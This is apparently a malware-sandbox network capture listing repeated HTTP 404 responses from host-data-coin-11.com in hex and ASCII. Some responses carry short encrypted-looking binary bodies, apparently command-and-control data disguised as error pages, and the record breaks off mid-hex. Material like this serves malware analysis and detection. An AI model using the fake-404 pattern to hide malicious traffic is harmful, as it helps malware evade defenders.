Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 20:05:07 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 20:05:08 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f6 e8 24 e5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a | Data Ascii: 30I:82OR&:UPJ$dP0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 20:05:10 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 20:05:10 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 20:05:10 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 32 62 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3c 5c a2 f7 d8 fc fb 46 f5 46 86 32 ef 06 10 c2 4b e1 e1 39 0d 0a 30 0d 0a 0d 0a | Data Ascii: 2bI:82OI<\FF2K90
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 20:05:13 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 20:05:13 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 20:05:14 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 36 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 51 da 44 d0 f8 20 8c 21 ea ad 96 56 2c e4 b4 48 2b e3 b3 b6 68 f3 9a b9 59 a8 77 9f cb 31 41 5b 3d 03 4b de bb 4b bb ff 5b 91 ad d3 02 c4 60 9d d2 69 0d 0a 30 0d 0a 0d 0a | Data Ascii: 66I:82OB%,YR("XQD !V,H+hYw1A[=KK[`i0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 20:05:16 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 20:05:17 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 20:05:17 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 1e 49 3a 44 a6 e8 de ea e4 40 fd 45 91 6e b8 57 5b 91 17 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a | Data Ascii: 2cI:82OI:D@EnW[10
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 20:05:39 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 20:05:40 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 20:05:40 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 20:05:40 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 